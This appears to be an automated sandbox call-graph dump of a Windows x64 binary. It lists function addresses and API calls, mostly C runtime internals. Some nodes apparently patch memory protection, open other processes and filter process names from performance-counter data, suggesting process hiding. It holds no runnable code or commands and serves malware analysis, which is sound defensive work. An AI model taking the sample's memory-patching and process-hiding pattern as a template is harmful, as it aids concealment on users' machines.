18147->18152 18150 2241390d06c _invalid_parameter_noinfo 17 API calls 18148->18150 18154 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18149->18154 18162 2241390da17 18150->18162 18155 2241390d977 18151->18155 18253 2241390eee0 18151->18253 18153 2241390d220 __std_exception_copy 13 API calls 18152->18153 18157 2241390d96d 18153->18157 18154->18148 18155->18149 18156 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18155->18156 18156->18149 18160 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18157->18160 18159 2241390da7a 18164 2241390da8c 18159->18164 18170 2241390daa1 18159->18170 18160->18155 18161 2241390d9b5 18165 2241390d9ba 18161->18165 18166 2241390d9d0 18161->18166 18162->18159 18262 224139113d8 18162->18262 18168 2241390d894 52 API calls 18164->18168 18169 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18165->18169 18167 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18166->18167 18167->18149 18183 2241390da9c 18168->18183 18169->18155 18172 2241390dd78 14 API calls 18170->18172 18171 22413908070 _invalid_parameter_noinfo 8 API calls 18173 2241390dd64 18171->18173 18174 2241390db0b 18172->18174 18173->18111 18176 2241390db1a 18174->18176 18271 2241390f198 18174->18271 18275 2241390d30c 18176->18275 18179 2241390dba8 18180 2241390d894 52 API calls 18179->18180 18181 2241390dbb8 18180->18181 18181->18183 18184 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18181->18184 18182 2241390dd78 14 API calls 18192 2241390dbd2 18182->18192 18183->18171 18184->18183 18185 2241390f198 9 API calls 18185->18192 18187 2241390d894 52 API calls 18187->18192 18188 2241390dcc8 FindNextFileW 18190 2241390dce0 18188->18190 18188->18192 18189 2241390dd2a 18191 2241390dd38 FindClose 18189->18191 18194 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18189->18194 18193 2241390dd0c FindClose 18190->18193 18319 22413910b20 18190->18319 18191->18183 18195 2241390dd48 18191->18195 18192->18182 18192->18185 18192->18187 18192->18188 18192->18189 18196 2241390d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 18192->18196 18297 2241390d4ac 18192->18297 18193->18183 18198 2241390dd1c 18193->18198 18194->18191 18199 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18195->18199 18196->18192 18200 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18198->18200 18199->18183 18200->18183 18202 2241390da58 18201->18202 18203 2241390da7a 18201->18203 18202->18203 18204 224139113d8 38 API calls 18202->18204 18205 2241390da8c 18203->18205 18207 2241390daa1 18203->18207 18204->18202 18206 2241390d894 56 API calls 18205->18206 18233 2241390da9c 18206->18233 18209 2241390dd78 14 API calls 18207->18209 18208 22413908070 _invalid_parameter_noinfo 8 API calls 18210 2241390dd64 18208->18210 18211 2241390db0b 18209->18211 18210->18111 18212 2241390db1a 18211->18212 18213 2241390f198 9 API calls 18211->18213 18214 2241390d30c 16 API calls 18212->18214 18213->18212 18215 2241390db7b FindFirstFileExW 18214->18215 18216 2241390dba8 18215->18216 18220 2241390dbd2 18215->18220 18217 2241390d894 56 API calls 18216->18217 18218 2241390dbb8 18217->18218 18221 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18218->18221 18218->18233 18219 2241390dd78 14 API calls 18219->18220 18220->18219 18222 2241390f198 9 API calls 18220->18222 18223 2241390d4ac 16 API calls 18220->18223 18224 2241390d894 56 API calls 18220->18224 18225 2241390dcc8 FindNextFileW 18220->18225 18226 2241390dd2a 18220->18226 18228 2241390d2a0 13 API calls Concurrency::details::SchedulerProxy::DeleteThis 18220->18228 18221->18233 18222->18220 18223->18220 18224->18220 18225->18220 18227 2241390dce0 18225->18227 18229 2241390dd38 FindClose 18226->18229 18231 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18226->18231 18230 2241390dd0c FindClose 18227->18230 18234 22413910b20 38 API calls 18227->18234 18228->18220 18232 2241390dd48 18229->18232 18229->18233 18230->18233 18235 2241390dd1c 18230->18235 18231->18229 18236 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18232->18236 18233->18208 18234->18230 18237 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18235->18237 18236->18233 18237->18233 18239 2241390bba4 18238->18239 18240 2241390bb6c 18238->18240 18239->18117 18239->18127 18240->18239 18241 2241390d220 __std_exception_copy 13 API calls 18240->18241 18242 2241390bb9a 18241->18242 18243 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18242->18243 18243->18239 18245 22413910ed5 18244->18245 18247 22413910ef0 18245->18247 18249 22413910eda 18245->18249 18251 22413910f24 18245->18251 18246 2241390d1f4 __std_exception_copy 13 API calls 18248 22413910ee4 18246->18248 18247->18127 18250 2241390d04c _invalid_parameter_noinfo 38 API calls 18248->18250 18249->18246 18249->18247 18250->18247 18251->18247 18252 2241390d1f4 __std_exception_copy 13 API calls 18251->18252 18252->18248 18254 2241390ef1f 18253->18254 18255 2241390ef02 18253->18255 18256 2241390ef29 18254->18256 18327 224139119f0 18254->18327 18255->18254 18257 2241390ef10 18255->18257 18334 22413911a40 18256->18334 18258 2241390d1f4 __std_exception_copy 13 API calls 18257->18258 18261 2241390ef15 18258->18261 18261->18161 18263 224139113e0 18262->18263 18264 224139113f5 18263->18264 18265 2241391140e 18263->18265 18266 2241390d1f4 __std_exception_copy 13 API calls 18264->18266 18269 2241390dd78 14 API calls 18265->18269 18270 22413911405 18265->18270 18267 224139113fa 18266->18267 18268 2241390d04c _invalid_parameter_noinfo 38 API calls 18267->18268 18268->18270 18269->18270 18270->18162 18272 2241390f1ca 18271->18272 18273 2241390f1a9 18271->18273 18272->18176 18273->18272 18274 2241390ef88 9 API calls 18273->18274 18274->18272 18276 2241390d336 18275->18276 18277 2241390d35a 18275->18277 18281 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18276->18281 18284 2241390d345 FindFirstFileExW 18276->18284 18278 2241390d3bf 18277->18278 18279 2241390d35f 18277->18279 18280 2241390ec58 MultiByteToWideChar 18278->18280 18282 2241390d374 18279->18282 18279->18284 18285 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18279->18285 18291 2241390d3db 18280->18291 18281->18284 18286 2241390c5d0 14 API calls 18282->18286 18283 2241390d3e2 GetLastError 18346 2241390d184 18283->18346 18284->18179 18284->18192 18285->18282 18286->18284 18288 2241390d420 18288->18284 18292 2241390ec58 MultiByteToWideChar 18288->18292 18290 2241390d413 18296 2241390c5d0 14 API calls 18290->18296 18291->18283 18291->18288 18291->18290 18295 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18291->18295 18293 2241390d47a 18292->18293 18293->18283 18293->18284 18294 2241390d1f4 __std_exception_copy 13 API calls 18294->18284 18295->18290 18296->18288 18298 2241390d4d6 18297->18298 18299 2241390d4fa 18297->18299 18303 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18298->18303 18306 2241390d4e5 18298->18306 18300 2241390d55f 18299->18300 18301 2241390d500 18299->18301 18302 2241390ece8 WideCharToMultiByte 18300->18302 18304 2241390d515 18301->18304 18301->18306 18307 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18301->18307 18313 2241390d583 18302->18313 18303->18306 18308 2241390c5d0 14 API calls 18304->18308 18305 2241390d58a GetLastError 18309 2241390d184 13 API calls 18305->18309 18306->18192 18307->18304 18308->18306 18311 2241390d597 18309->18311 18310 2241390d5c7 18310->18306 18314 2241390ece8 WideCharToMultiByte 18310->18314 18316 2241390d1f4 __std_exception_copy 13 API calls 18311->18316 18312 2241390d5bb 18318 2241390c5d0 14 API calls 18312->18318 18313->18305 18313->18310 18313->18312 18317 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18313->18317 18315 2241390d629 18314->18315 18315->18305 18315->18306 18316->18306 18317->18312 18318->18310 18320 22413910b52 18319->18320 18321 2241390d1f4 __std_exception_copy 13 API calls 18320->18321 18326 22413910b67 18320->18326 18322 22413910b5c 18321->18322 18323 2241390d04c _invalid_parameter_noinfo 38 API calls 18322->18323 18323->18326 18324 22413908070 _invalid_parameter_noinfo 8 API calls 18325 22413910ea8 18324->18325 18325->18193 18326->18324 18328 224139119f9 18327->18328 18329 22413911a12 HeapSize 18327->18329 18330 2241390d1f4 __std_exception_copy 13 API calls 18328->18330 18331 224139119fe 18330->18331 18332 2241390d04c _invalid_parameter_noinfo 38 API calls 18331->18332 18333 22413911a09 18332->18333 18333->18256 18335 22413911a55 18334->18335 18336 22413911a5f 18334->18336 18337 2241390c5d0 14 API calls 18335->18337 18338 22413911a64 18336->18338 18344 22413911a6b __std_exception_copy 18336->18344 18342 22413911a5d 18337->18342 18339 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18338->18339 18339->18342 18340 22413911a9e HeapReAlloc 18340->18342 18340->18344 18341 22413911a71 18343 2241390d1f4 __std_exception_copy 13 API calls 18341->18343 18342->18261 18343->18342 18344->18340 18344->18341 18345 2241390b470 __std_exception_copy 2 API calls 18344->18345 18345->18344 18351 2241390d1d0 18346->18351 18348 2241390d191 Concurrency::details::SchedulerProxy::DeleteThis 18349 2241390d1f4 __std_exception_copy 13 API calls 18348->18349 18350 2241390d1a1 18349->18350 18350->18294 18352 2241390cb10 __std_exception_copy 13 API calls 18351->18352 18353 2241390d1d9 18352->18353 18353->18348 18354 2241391465f 18355 224139146e2 18354->18355 18356 22413914677 18354->18356 18356->18355 18357 22413909324 _CreateFrameInfo 9 API calls 18356->18357 18358 224139146c4 18357->18358 18359 22413909324 _CreateFrameInfo 9 API calls 18358->18359 18360 224139146d9 18359->18360 18361 2241390c2f4 14 API calls 18360->18361 18361->18355 16587 2241391485e 16588 22413909324 _CreateFrameInfo 9 API calls 16587->16588 16589 2241391486c 16588->16589 16590 22413909324 _CreateFrameInfo 9 API calls 16589->16590 16591 22413914877 16589->16591 16590->16591 17181 22413907f60 17182 22413907f7c 17181->17182 17183 22413907f81 17181->17183 17185 22413908090 17182->17185 17186 22413908127 17185->17186 17187 224139080b3 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 17185->17187 17186->17183 17187->17186 15977 22413913960 15987 22413908ca0 15977->15987 15979 22413913988 15982 22413913998 15983 22413909324 _CreateFrameInfo 9 API calls 15982->15983 15984 224139139a1 15983->15984 15994 2241390c2f4 15984->15994 15990 22413908cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 15987->15990 15988 22413908dd1 15988->15979 15991 22413909324 15988->15991 15989 22413908d94 RtlUnwindEx 15989->15990 15990->15988 15990->15989 15997 22413909340 15991->15997 15993 2241390932d 15993->15982 15995 2241390cab0 _invalid_parameter_noinfo 14 API calls 15994->15995 15996 2241390c2fd 15995->15996 15998 22413909358 15997->15998 15999 2241390935f GetLastError 15997->15999 15998->15993 16009 22413909c8c 15999->16009 16013 22413909aac 16009->16013 16014 22413909b96 TlsGetValue 16013->16014 16020 22413909af0 __vcrt_InitializeCriticalSectionEx 16013->16020 16015 22413909b1e LoadLibraryExW 16017 22413909bbd 16015->16017 16018 22413909b3f GetLastError 16015->16018 16016 22413909bdd GetProcAddress 16016->16014 16017->16016 16019 22413909bd4 FreeLibrary 16017->16019 16018->16020 16019->16016 16020->16014 16020->16015 16020->16016 16021 22413909b61 LoadLibraryExW 16020->16021 16021->16017 16021->16020 16022 2241390ad48 16023 22413909324 _CreateFrameInfo 9 API calls 16022->16023 16024 2241390ad7d 16023->16024 16025 22413909324 _CreateFrameInfo 9 API calls 16024->16025 16026 2241390ad8b __except_validate_context_record 16025->16026 16027 22413909324 _CreateFrameInfo 9 API calls 16026->16027 16028 2241390adcf 16027->16028 16029 22413909324 _CreateFrameInfo 9 API calls 16028->16029 16030 2241390add8 16029->16030 16031 22413909324 _CreateFrameInfo 9 API calls 16030->16031 16032 2241390ade1 16031->16032 16045 2241390993c 16032->16045 16035 22413909324 _CreateFrameInfo 9 API calls 16036 2241390ae11 __CxxCallCatchBlock 16035->16036 16052 22413909978 16036->16052 16038 2241390aeeb __CxxCallCatchBlock 16039 22413909324 _CreateFrameInfo 9 API calls 16038->16039 16040 2241390aefe 16039->16040 16041 22413909324 _CreateFrameInfo 9 API calls 16040->16041 16043 2241390af07 16041->16043 16046 22413909324 _CreateFrameInfo 9 API calls 16045->16046 16047 2241390994d 16046->16047 16048 22413909958 16047->16048 16049 22413909324 _CreateFrameInfo 9 API calls 16047->16049 16050 22413909324 _CreateFrameInfo 9 API calls 16048->16050 16049->16048 16051 22413909969 16050->16051 16051->16035 16051->16036 16053 22413909324 _CreateFrameInfo 9 API calls 16052->16053 16054 2241390998a 16053->16054 16055 224139099c5 16054->16055 16056 22413909324 _CreateFrameInfo 9 API calls 16054->16056 16057 22413909995 16056->16057 16057->16055 16058 22413909324 _CreateFrameInfo 9 API calls 16057->16058 16059 224139099b6 16058->16059 16059->16038 16060 22413908ff8 16059->16060 16061 22413909324 _CreateFrameInfo 9 API calls 16060->16061 16062 22413909006 16061->16062 16062->16038 16616 22413914848 16619 2241390904c 16616->16619 16620 22413909064 16619->16620 16621 22413909076 16619->16621 16620->16621 16622 2241390906c 16620->16622 16623 22413909324 _CreateFrameInfo 9 API calls 16621->16623 16624 22413909074 16622->16624 16626 22413909324 _CreateFrameInfo 9 API calls 16622->16626 16625 2241390907b 16623->16625 16625->16624 16627 22413909324 _CreateFrameInfo 9 API calls 16625->16627 16628 2241390909b 16626->16628 16627->16624 16629 22413909324 _CreateFrameInfo 9 API calls 16628->16629 16630 224139090a8 16629->16630 16631 2241390c2f4 14 API calls 16630->16631 16632 224139090b1 16631->16632 16633 2241390c2f4 14 API calls 16632->16633 16634 224139090bd 16633->16634 18370 2241390824c 18371 22413908270 __scrt_release_startup_lock 18370->18371 18372 2241390b581 18371->18372 18373 2241390cb10 __std_exception_copy 13 API calls 18371->18373 18374 2241390b5aa 18373->18374 16104 2241391494f 16105 22413914968 16104->16105 16106 2241391495e 16104->16106 16108 2241390c5ac LeaveCriticalSection 16106->16108 16114 22413905974 16115 2241390597a 16114->16115 16126 22413907fa0 16115->16126 16119 224139059de 16120 22413905a77 16120->16119 16123 22413905bfd 16120->16123 16139 22413907b80 16120->16139 16122 22413905cfb 16123->16122 16124 22413905d77 VirtualProtect 16123->16124 16124->16119 16125 22413905da3 GetLastError 16124->16125 16125->16119 16127 22413907fab 16126->16127 16128 224139059bd 16127->16128 16129 2241390b470 __std_exception_copy 2 API calls 16127->16129 16130 22413907fca 16127->16130 16128->16119 16135 22413904400 16128->16135 16129->16127 16131 22413907fd5 16130->16131 16145 224139087b8 16130->16145 16149 224139087d8 16131->16149 16136 2241390441d 16135->16136 16138 2241390448c 16136->16138 16158 22413904670 16136->16158 16138->16120 16140 22413907bc7 16139->16140 16183 22413907950 16140->16183 16143 22413908070 _invalid_parameter_noinfo 8 API calls 16144 22413907bf1 16143->16144 16144->16120 16146 224139087c6 std::bad_alloc::bad_alloc 16145->16146 16153 22413909178 16146->16153 16148 224139087d7 16150 224139087e6 std::bad_alloc::bad_alloc 16149->16150 16151 22413909178 Concurrency::cancel_current_task 2 API calls 16150->16151 16152 22413907fdb 16151->16152 16154 22413909197 16153->16154 16155 224139091c0 RtlPcToFileHeader 16154->16155 16156 224139091e2 RaiseException 16154->16156 16157 224139091d8 16155->16157 16156->16148 16157->16156 16159 22413904694 16158->16159 16164 224139046b7 16158->16164 16159->16164 16172 22413904120 16159->16172 16161 224139046ed 16162 2241390471d 16161->16162 16167 22413904250 2 API calls 16161->16167 16163 22413904753 16162->16163 16168 22413904120 3 API calls 16162->16168 16166 2241390476f 16163->16166 16169 22413904120 3 API calls 16163->16169 16164->16161 16178 22413904250 16164->16178 16170 2241390478b 16166->16170 16171 22413904250 2 API calls 16166->16171 16167->16162 16168->16163 16169->16166 16170->16138 16171->16170 16177 22413904141 16172->16177 16173 224139041b0 16173->16164 16174 22413904196 VirtualQuery 16174->16173 16174->16177 16175 224139041ca VirtualAlloc 16175->16173 16176 224139041fb GetLastError 16175->16176 16176->16173 16176->16177 16177->16173 16177->16174 16177->16175 16181 22413904268 16178->16181 16179 224139042d7 16179->16161 16180 224139042bd VirtualQuery 16180->16179 16180->16181 16181->16179 16181->16180 16182 22413904322 GetLastError 16181->16182 16182->16181 16184 2241390796b 16183->16184 16185 2241390798f 16184->16185 16186 22413907981 SetLastError 16184->16186 16185->16143 16186->16185 16635 2241391387c 16636 224139138b4 __GSHandlerCheckCommon 16635->16636 16637 224139138e0 16636->16637 16639 22413909a24 16636->16639 16640 22413909324 _CreateFrameInfo 9 API calls 16639->16640 16641 22413909a4e 16640->16641 16642 22413909324 _CreateFrameInfo 9 API calls 16641->16642 16643 22413909a5b 16642->16643 16644 22413909324 _CreateFrameInfo 9 API calls 16643->16644 16645 22413909a64 16644->16645 16645->16637 16278 2241390c180 16281 2241390bf38 16278->16281 16288 2241390bf00 16281->16288 16286 2241390bebc 13 API calls 16287 2241390bf6b 16286->16287 16289 2241390bf15 16288->16289 16290 2241390bf10 16288->16290 16292 2241390bf1c 16289->16292 16291 2241390bebc 13 API calls 16290->16291 16291->16289 16293 2241390bf2c 16292->16293 16294 2241390bf31 16292->16294 16295 2241390bebc 13 API calls 16293->16295 16294->16286 16295->16294 16699 2241390f870 16700 2241390f8a0 16699->16700 16702 2241390f8c7 16699->16702 16701 2241390cb10 __std_exception_copy 13 API calls 16700->16701 16700->16702 16707 2241390f8b4 16700->16707 16701->16707 16703 2241390f99c 16702->16703 16722 2241390c558 EnterCriticalSection 16702->16722 16705 2241390f9ca 16703->16705 16706 2241390fab3 16703->16706 16720 2241390fa03 16703->16720 16715 2241390cab0 _invalid_parameter_noinfo 14 API calls 16705->16715 16705->16720 16713 2241390fac0 16706->16713 16724 2241390c5ac LeaveCriticalSection 16706->16724 16707->16702 16708 2241390f949 16707->16708 16716 2241390f904 16707->16716 16711 2241390d1f4 __std_exception_copy 13 API calls 16708->16711 16712 2241390f94e 16711->16712 16714 2241390d04c _invalid_parameter_noinfo 38 API calls 16712->16714 16714->16716 16717 2241390f9f3 16715->16717 16718 2241390cab0 _invalid_parameter_noinfo 14 API calls 16717->16718 16718->16720 16719 2241390fa61 16721 2241390cab0 14 API calls _invalid_parameter_noinfo 16719->16721 16720->16719 16723 2241390c5ac LeaveCriticalSection 16720->16723 16721->16719 17214 2241390f370 VirtualProtect 18383 22413908672 18384 224139090c0 __std_exception_copy 38 API calls 18383->18384 18385 2241390869d 18384->18385 17224 22413911398 17226 224139113ae 17224->17226 17225 224139113f5 17228 2241390d1f4 __std_exception_copy 13 API calls 17225->17228 17226->17225 17227 2241391140e 17226->17227 17231 2241390dd78 14 API calls 17227->17231 17232 22413911405 17227->17232 17229 224139113fa 17228->17229 17230 2241390d04c _invalid_parameter_noinfo 38 API calls 17229->17230 17230->17232 17231->17232 17233 2241391479d 17236 2241390af34 17233->17236 17237 2241390af4e 17236->17237 17239 2241390af9b 17236->17239 17238 22413909324 _CreateFrameInfo 9 API calls 17237->17238 17237->17239 17238->17239 15030 2241390f6a0 15041 2241390c558 EnterCriticalSection 15030->15041 15032 2241390f6b0 15033 22413911c5c 39 API calls 15032->15033 15034 2241390f6b9 15033->15034 15035 2241390f6c7 15034->15035 15037 2241390f498 41 API calls 15034->15037 15036 2241390c5ac Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 15035->15036 15039 2241390f6d3 15036->15039 15038 2241390f6c2 15037->15038 15040 2241390f598 GetStdHandle GetFileType 15038->15040 15040->15035 16725 22413905c8d 16727 22413905c94 16725->16727 16726 22413905cfb 16727->16726 16728 22413905d77 VirtualProtect 16727->16728 16729 22413905da3 GetLastError 16728->16729 16730 22413905db1 16728->16730 16729->16730 17247 22413902ab4 TlsGetValue TlsGetValue TlsGetValue 17248 22413902b0d 17247->17248 17253 22413902b79 17247->17253 17250 22413902b15 17248->17250 17248->17253 17249 22413902b74 17250->17249 17251 22413902c32 TlsSetValue TlsSetValue TlsSetValue 17250->17251 17252 22413903f88 StrCmpNIW 17250->17252 17251->17249 17252->17250 17253->17249 17253->17251 17254 22413903f88 StrCmpNIW 17253->17254 17254->17253 16296 224139034b8 16297 224139034e8 16296->16297 16298 224139035a1 16297->16298 16299 22413903505 PdhGetCounterInfoW 16297->16299 16299->16298 16300 22413903523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 16299->16300 16301 22413903555 StrCmpW 16300->16301 16302 2241390358d GetProcessHeap HeapFree 16300->16302 16301->16302 16304 2241390356a 16301->16304 16302->16298 16304->16302 16305 22413903950 StrCmpNW 16304->16305 16306 22413903982 StrStrW 16305->16306 16309 224139039f2 16305->16309 16307 2241390399b StrToIntW 16306->16307 16306->16309 16308 224139039c3 16307->16308 16307->16309 16308->16309 16315 22413901a30 OpenProcess 16308->16315 16309->16304 16316 22413901a64 K32GetModuleFileNameExW 16315->16316 16317 22413901ab6 16315->16317 16318 22413901aad CloseHandle 16316->16318 16319 22413901a7e PathFindFileNameW lstrlenW 16316->16319 16317->16309 16321 22413903f88 16317->16321 16318->16317 16319->16318 16320 22413901a9c StrCpyW 16319->16320 16320->16318 16322 22413903f95 StrCmpNIW 16321->16322 16323 224139039e4 16321->16323 16322->16323 16323->16309 16324 22413901cfc 16323->16324 16325 22413901d13 16324->16325 16327 22413901d1c 16324->16327 16326 22413901530 2 API calls 16325->16326 16326->16327 16327->16309 16328 224139334b8 16329 224139334e8 16328->16329 16330 224139335a1 16329->16330 16331 22413933505 PdhGetCounterInfoW 16329->16331 16331->16330 16332 22413933523 GetProcessHeap HeapAlloc PdhGetCounterInfoW 16331->16332 16333 22413933555 StrCmpW 16332->16333 16334 2241393358d GetProcessHeap HeapFree 16332->16334 16333->16334 16335 2241393356a 16333->16335 16334->16330 16335->16334 16337 22413933950 StrCmpNW 16335->16337 16338 22413933982 StrStrW 16337->16338 16341 224139339f2 16337->16341 16339 2241393399b StrToIntW 16338->16339 16338->16341 16340 224139339c3 16339->16340 16339->16341 16340->16341 16347 22413931a30 OpenProcess 16340->16347 16341->16335 16348 22413931ab6 16347->16348 16349 22413931a64 K32GetModuleFileNameExW 16347->16349 16348->16341 16353 22413933f88 16348->16353 16350 22413931a7e PathFindFileNameW lstrlenW 16349->16350 16351 22413931aad CloseHandle 16349->16351 16350->16351 16352 22413931a9c StrCpyW 16350->16352 16351->16348 16352->16351 16354 22413933f95 StrCmpNIW 16353->16354 16355 224139339e4 16353->16355 16354->16355 16355->16341 16356 22413931cfc 16355->16356 16357 22413931d1c 16356->16357 16358 22413931d13 16356->16358 16357->16341 16360 22413931530 16358->16360 16361 22413931580 16360->16361 16364 2241393154a 16360->16364 16361->16357 16362 22413931569 StrCmpW 16362->16364 16363 22413931561 StrCmpIW 16363->16364 16364->16361 16364->16362 16364->16363 18408 224139081c0 18410 224139081c9 __scrt_release_startup_lock 18408->18410 18409 224139081cd 18410->18409 18412 2241390bbb4 18410->18412 18413 2241390bbd4 18412->18413 18440 2241390bbed 18412->18440 18414 2241390bbdc 18413->18414 18415 2241390bbf2 18413->18415 18416 2241390d1f4 __std_exception_copy 13 API calls 18414->18416 18417 2241390e864 56 API calls 18415->18417 18418 2241390bbe1 18416->18418 18419 2241390bbf7 18417->18419 18420 2241390d04c _invalid_parameter_noinfo 38 API calls 18418->18420 18441 2241390df38 GetModuleFileNameW 18419->18441 18420->18440 18425 2241390bb54 13 API calls 18426 2241390bc61 18425->18426 18427 2241390bc69 18426->18427 18428 2241390bc7a 18426->18428 18429 2241390d1f4 __std_exception_copy 13 API calls 18427->18429 18430 2241390b994 14 API calls 18428->18430 18431 2241390bc6e 18429->18431 18432 2241390bc96 18430->18432 18433 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18431->18433 18432->18431 18434 2241390bcc6 18432->18434 18435 2241390bcdf 18432->18435 18433->18440 18436 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18434->18436 18438 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18435->18438 18437 2241390bccf 18436->18437 18439 2241390d2a0 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 18437->18439 18438->18431 18439->18440 18440->18409 18442 2241390df7d GetLastError 18441->18442 18443 2241390df91 18441->18443 18444 2241390d184 13 API calls 18442->18444 18445 2241390dd78 14 API calls 18443->18445 18446 2241390df8a 18444->18446 18447 2241390dfbf 18445->18447 18449 22413908070 _invalid_parameter_noinfo 8 API calls 18446->18449 18448 2241390f198 9 API calls 18447->18448 18452 2241390dfd0 18447->18452 18448->18452 18451 2241390bc0e 18449->18451 18453 2241390b994 18451->18453 18459 2241390de1c 18452->18459 18455 2241390b9d2 18453->18455 18457 2241390ba38 18455->18457 18473 2241390ec1c 18455->18473 18456 2241390bb25 18456->18425 18457->18456 18458 2241390ec1c 14 API calls 18457->18458 18458->18457 18460 2241390de5b 18459->18460 18461 2241390de40 18459->18461 18462 2241390ece8 WideCharToMultiByte 18460->18462 18468 2241390de60 18460->18468 18461->18446 18463 2241390deb7 18462->18463 18465 2241390debe GetLastError 18463->18465 18467 2241390dee9 18463->18467 18463->18468 18464 2241390d1f4 __std_exception_copy 13 API calls 18464->18461 18466 2241390d184 13 API calls 18465->18466 18470 2241390decb 18466->18470 18469 2241390ece8 WideCharToMultiByte 18467->18469 18468->18461 18468->18464 18471 2241390df10 18469->18471 18472 2241390d1f4 __std_exception_copy 13 API calls 18470->18472 18471->18461 18471->18465 18472->18461 18474 2241390eba8 18473->18474 18475 2241390dd78 14 API calls 18474->18475 18476 2241390ebcc 18475->18476 18476->18455 16746 224139147c2 16747 22413909978 __CxxCallCatchBlock 9 API calls 16746->16747 16751 224139147d5 16747->16751 16748 22413914814 __CxxCallCatchBlock 16749 22413909324 _CreateFrameInfo 9 API calls 16748->16749 16750 22413914828 16749->16750 16752 22413909324 _CreateFrameInfo 9 API calls 16750->16752 16751->16748 16754 22413908ff8 __CxxCallCatchBlock 9 API calls 16751->16754 16753 22413914838 16752->16753 16754->16748 16759 224139033a8 16760 224139033cf 16759->16760 16761 2241390349c 16760->16761 16762 224139033ec PdhGetCounterInfoW 16760->16762 16762->16761 16763 2241390340e GetProcessHeap HeapAlloc PdhGetCounterInfoW 16762->16763 16764 22413903488 GetProcessHeap HeapFree 16763->16764 16765 22413903440 StrCmpW 16763->16765 16764->16761 16765->16764 16766 22413903455 16765->16766 16766->16764 16767 22413903950 12 API calls 16766->16767 16767->16766 16768 22413910fa8 16769 22413910fcc 16768->16769 16770 22413908070 _invalid_parameter_noinfo 8 API calls 16769->16770 16771 2241391100e 16770->16771 17263 2241390aaac 17264 2241390aad9 __except_validate_context_record 17263->17264 17265 22413909324 _CreateFrameInfo 9 API calls 17264->17265 17267 2241390aade 17265->17267 17266 2241390ab38 17268 2241390abb3 17266->17268 17274 2241390ab5a __GetCurrentState 17266->17274 17278 2241390ab8c 17266->17278 17267->17266 17270 2241390abc6 17267->17270 17267->17278 17292 224139095d0 17268->17292 17273 2241390abe5 17270->17273 17299 224139099cc 17270->17299 17277 2241390ac34 17273->17277 17273->17278 17302 224139099e0 17273->17302 17275 2241390acdd 17274->17275 17280 2241390afb8 17274->17280 17277->17278 17305 2241390a22c 17277->17305 17281 224139099cc Is_bad_exception_allowed 9 API calls 17280->17281 17282 2241390afe7 __GetCurrentState 17281->17282 17283 22413909324 _CreateFrameInfo 9 API calls 17282->17283 17290 2241390b004 __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 17283->17290 17284 2241390b0fb 17285 22413909324 _CreateFrameInfo 9 API calls 17284->17285 17286 2241390b100 17285->17286 17287 22413909324 _CreateFrameInfo 9 API calls 17286->17287 17288 2241390b10b __FrameHandler3::GetHandlerSearchState 17286->17288 17287->17288 17288->17278 17289 224139099cc 9 API calls Is_bad_exception_allowed 17289->17290 17290->17284 17290->17288 17290->17289 17291 224139099f4 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17290->17291 17291->17290 17362 22413909634 17292->17362 17294 224139095ef __FrameHandler3::ExecutionInCatch 17366 22413909540 17294->17366 17297 2241390afb8 __FrameHandler3::FrameUnwindToEmptyState 9 API calls 17298 22413909624 17297->17298 17298->17278 17300 22413909324 _CreateFrameInfo 9 API calls 17299->17300 17301 224139099d5 17300->17301 17301->17273 17303 22413909324 _CreateFrameInfo 9 API calls 17302->17303 17304 224139099e9 17303->17304 17304->17277 17370 2241390b144 17305->17370 17307 2241390a6f4 17308 2241390a645 17308->17307 17348 2241390a643 17308->17348 17423 2241390a6fc 17308->17423 17309 2241390a373 17309->17308 17353 2241390a3ab 17309->17353 17311 22413909324 _CreateFrameInfo 9 API calls 17314 2241390a687 17311->17314 17312 22413909324 _CreateFrameInfo 9 API calls 17316 2241390a2da 17312->17316 17314->17307 17317 22413908070 _invalid_parameter_noinfo 8 API calls 17314->17317 17315 2241390a575 17318 2241390a592 17315->17318 17320 224139099cc Is_bad_exception_allowed 9 API calls 17315->17320 17315->17348 17316->17314 17321 22413909324 _CreateFrameInfo 9 API calls 17316->17321 17319 2241390a69a 17317->17319 17324 2241390a5b4 17318->17324 17318->17348 17416 224139095a4 17318->17416 17319->17278 17320->17318 17323 2241390a2ea 17321->17323 17325 22413909324 _CreateFrameInfo 9 API calls 17323->17325 17326 2241390a6d7 17324->17326 17327 2241390a5ca 17324->17327 17324->17348 17328 2241390a2f3 17325->17328 17330 22413909324 